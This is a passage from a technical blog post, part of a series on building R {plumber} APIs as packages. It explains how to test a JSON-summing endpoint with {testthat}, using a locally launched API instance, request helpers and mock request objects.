&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/api-as-a-package-structure/" rel="external"&gt;Part 1: API as a package:
Structure&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/api-as-a-package-logging/" rel="external"&gt;Part 2: API as a package:
Logging&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 3: API as a package: Testing (this post)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This blog post continues our API as a package series and expands on
the topic of testing {plumber} API applications within the package
structure, leveraging {testthat}. As a reminder of the situation, so far
we have an R package that defines functions that will be used as
endpoints in a {plumber} API application. The API routes defined via
{plumber} decorators in &lt;code&gt;inst&lt;/code&gt; simply map the package
functions to URLs.&lt;/p&gt;
&lt;h2 id="the-three-stages-of-testing"&gt;The three stages of testing&lt;/h2&gt;
&lt;p&gt;The intended structure of the API as a package setup is to encourage a
particular, consistent, composition of code for each exposed endpoint.
That is:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;A plumber decorator that maps a package function to a URL&lt;/li&gt;
&lt;li&gt;A wrapper function that takes a request object, deals with any
serialization of data and dispatches to a “business logic” function&lt;/li&gt;
&lt;li&gt;The “business logic” function, or core functionality of the purpose
of a particular endpoint&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;With that, we believe that this induces three levels of testing to
consider:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Does the running API application successfully return an appropriate
response when we make a request to an endpoint?&lt;/li&gt;
&lt;li&gt;Does the wrapper function behave as we expect when it is given a
request object?&lt;/li&gt;
&lt;li&gt;Is the business logic correct?&lt;/li&gt;
&lt;/ul&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-api-as-a-package-testing"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="example-sum"&gt;Example: Sum&lt;/h2&gt;
&lt;p&gt;Consider a POST endpoint that will sum the numeric contents of objects.
For simplicity, we will consider only requests that send valid JSON.
Even so, there are a few scenarios that might arise:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;A JSON array&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# array.json
[1, 2]
# expected sum: [3]
&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;A single JSON object&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# single_object.json
{
&amp;quot;a&amp;quot;: 1,
&amp;quot;b&amp;quot;: 2
}
# expected sum: [3]
&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;An array of JSON objects&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# array_objects.json
[
{
&amp;quot;a&amp;quot;: 1,
&amp;quot;b&amp;quot;: 2
},
{
&amp;quot;a&amp;quot;: 1,
&amp;quot;b&amp;quot;: 2
}
]
# expected sum: [3, 3]
&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h3 id="r-code-solution"&gt;R code solution&lt;/h3&gt;
&lt;p&gt;Writing some R code to ensure that we calculate the expected sums for
each of these is fairly simple, keeping in mind that when parsing JSON
objects we would obtain a named list to represent an object and an
unnamed list to represent an array:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R/api_sum.R&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# function to check whether the object we &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# receive looks like a json array&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;is_array &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(parsed_json) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;is.null&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;names&lt;/span&gt;(parsed_json))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# function to sum the numeric components in a list&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sum_list &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(l) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; purrr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;keep&lt;/span&gt;(l, is.numeric) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt; purrr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;reduce&lt;/span&gt;(`+`, .init &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# main sum function which handles lists of lists appropriately&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;my_sum &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(x) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (&lt;span style="color:#d2a8ff;font-weight:bold"&gt;is_array&lt;/span&gt;(x)) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;is.list&lt;/span&gt;(x)) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; purrr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;map&lt;/span&gt;(x, sum_list)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; } &lt;span style="color:#ff7b72"&gt;else&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sum&lt;/span&gt;(x)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; } &lt;span style="color:#ff7b72"&gt;else&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sum_list&lt;/span&gt;(x)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To integrate this into our API service we can then write a wrapper
function&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R/api_sum.R&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;#39; @export&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;api_sum &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(req) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# parse the JSON body of the request&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; parsed_json &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; jsonlite&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;fromJSON&lt;/span&gt;(req&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;postBody)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# return the sum&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;my_sum&lt;/span&gt;(parsed_json))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and add a plumber annotation in &lt;code&gt;inst/extdata/api/routes/example.R&lt;/code&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#* @post /sum&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#* @serializer unboxedJSON&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cookieCutter&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;api_sum
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;which exposes our sum function on the URL &lt;code&gt;&amp;lt;root_of_api&amp;gt;/example/sum&lt;/code&gt;.&lt;/p&gt;
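&lt;p&gt;As a quick sanity check of the business logic, the sketch below parses the three example payloads with &lt;code&gt;jsonlite::fromJSON()&lt;/code&gt; and passes each result to &lt;code&gt;my_sum()&lt;/code&gt;. It is only an illustration: the helpers are restated with base R (&lt;code&gt;Filter()&lt;/code&gt; and &lt;code&gt;Reduce()&lt;/code&gt; stand in for the {purrr} calls) so that the block runs on its own, and the variable names are our own. Note that, with the default simplification in {jsonlite}, a numeric array arrives as an atomic vector and an array of objects as a data frame, so the list-mapping branch is not reached by these three inputs.&lt;/p&gt;

```r
# Base R restatement of the helpers from R/api_sum.R (an assumption made to
# keep this sketch self-contained; the package version uses {purrr}).
is_array = function(parsed_json) {
  is.null(names(parsed_json))
}

sum_list = function(l) {
  Reduce(`+`, Filter(is.numeric, l), 0)
}

my_sum = function(x) {
  if (is_array(x)) {
    if (is.list(x)) lapply(x, sum_list) else sum(x)
  } else {
    sum_list(x)
  }
}

# Parse each scenario in the same way that api_sum() parses a request body.
array_case = jsonlite::fromJSON("[1, 2]")
object_case = jsonlite::fromJSON('{"a": 1, "b": 2}')
array_objects_case = jsonlite::fromJSON('[{"a": 1, "b": 2}, {"a": 1, "b": 2}]')

class(array_case)          # an atomic vector without names
class(object_case)         # a named list
class(array_objects_case)  # a data frame, which also has names

my_sum(array_case)          # 3
my_sum(object_case)         # 3
my_sum(array_objects_case)  # 3 3
```

&lt;p&gt;Checking the parsed shapes like this is a cheap way to confirm which branch of &lt;code&gt;my_sum()&lt;/code&gt; each payload exercises before writing the tests.&lt;/p&gt;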
&lt;h2 id="testing-setup"&gt;Testing: Setup&lt;/h2&gt;
&lt;p&gt;With the above example we are now ready to start writing some tests.
There are a few elements which are likely to be common when wanting to
test endpoints of an API application:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Start an instance of your API&lt;/li&gt;
&lt;li&gt;Send a request to your local running API&lt;/li&gt;
&lt;li&gt;Create a mock object that looks like a real rook request object&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The {testthat} package for R has utilities that make defining and using
common structures like this easy. A &lt;code&gt;tests/testthat/setup.R&lt;/code&gt; script will
run before any tests are executed. Here we can put together the setup
and subsequent tear down for a running API instance. For the
cookieCutter example package being built as part of this series, this
might look like&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# test/testthat/setup.R&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## run before any tests&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# pick a random available port to serve your app locally&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# note that port will also be available in the environment in which your&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# tests run.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;port &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; httpuv&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;randomPort&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# start a background R process that launches an instance of the API&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# serving on that random port&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;running_api &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; callr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;r_bg&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(port) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dir &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; cookieCutter&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_internal_routes&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; routes &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; cookieCutter&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;create_routes&lt;/span&gt;(dir)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; api &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; cookieCutter&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;generate_api&lt;/span&gt;(routes)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; api&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;run&lt;/span&gt;(port &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; port, host &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;0.0.0.0&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(port &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; port)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;Sys.sleep&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## run after all tests&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;withr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;defer&lt;/span&gt;(running_api&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;kill&lt;/span&gt;(), testthat&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;teardown_env&lt;/span&gt;())
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;With this, as our test suite runs, we can send requests to our API at
the following url pattern, &lt;code&gt;http://0.0.0.0:{port}{endpoint}&lt;/code&gt;.&lt;/p&gt;
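&lt;p&gt;The fixed &lt;code&gt;Sys.sleep(2)&lt;/code&gt; in the setup script assumes that the API is ready within two seconds. One possible alternative, sketched below, is to poll the port until it accepts a connection. The helper &lt;code&gt;wait_for_port()&lt;/code&gt; is hypothetical: it is not part of cookieCutter or {testthat}, it uses only base R, and the number of attempts and the interval are arbitrary choices.&lt;/p&gt;

```r
# Hypothetical helper (not part of cookieCutter or {testthat}): poll a port
# until something accepts a TCP connection, or give up after `attempts` tries.
wait_for_port = function(port, host = "127.0.0.1", attempts = 20, interval = 0.1) {
  for (i in seq_len(attempts)) {
    con = tryCatch(
      suppressWarnings(
        socketConnection(host = host, port = port, open = "r+",
                         blocking = TRUE, timeout = 1)
      ),
      # a refused connection raises an error, which we treat as "not ready"
      error = function(e) NULL
    )
    if (!is.null(con)) {
      close(con)
      return(TRUE)
    }
    Sys.sleep(interval)
  }
  FALSE
}

# In setup.R this could stand in for Sys.sleep(2), for example:
# api_ready = wait_for_port(port)
```

&lt;p&gt;The return value could also feed into a skip helper, so that request tests are skipped rather than failed when the API never becomes reachable.&lt;/p&gt;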
&lt;p&gt;Similarly, {testthat} allows for defining helper functions for the
purposes of your test-suite. Any file with “helper” at the beginning of
the name in your testthat directory will be executed before your tests
run. We might use this to define some helper functions which will allow
us to send requests easily and create mock objects, as well as some
other things.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# tests/testthat/helper-example.R&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# convenience function for creating correct endpoint url&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;endpoint &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(str) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; glue&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;glue&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;http://0.0.0.0:{port}{str}&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# convenience function for sending post requests to our test api&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;api_post &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(url, &lt;span style="color:#79c0ff"&gt;...&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; httr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;POST&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;endpoint&lt;/span&gt;(url), &lt;span style="color:#79c0ff"&gt;...&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# function to create minimal mock request objects&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# doesn&amp;#39;t fully replicate a rook request, but gives the parts&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# we need&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;as_fake_post &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(obj) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; req &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;new.env&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; req&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;HTTP_CONTENT_TYPE &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;application/json&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; req&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;postBody &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; obj
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; req
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You might also want to skip the API request tests in cases where the API
service did not launch correctly&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# tests/testthat/helper-example.R&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# skip other tests if api is not alive&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;skip_dead_api &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;() {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# running_api is created in setup.R&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; testthat&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;skip_if_not&lt;/span&gt;(running_api&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;is_alive&lt;/span&gt;(), &lt;span style="color:#a5d6ff"&gt;&amp;#34;API not started&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;One of the things that we like to do, inspired by the
&lt;a href="https://pypi.org/project/pytest-datadir/" rel="external"&gt;pytest-datadir&lt;/a&gt; plugin for
the python testing framework, pytest, is have numerous test cases stored
as data files. This makes it easy to run your tests against many
examples, as well as to add new ones that should be tested in future.
With that our final helper function might be&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# tests/testthat/helper-example.R&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;test_case_json &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(path) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# test_path() will give appropriate path to running test environment&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; file &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; testthat&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_path&lt;/span&gt;(path)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# read a file from disk&lt;/span&gt;
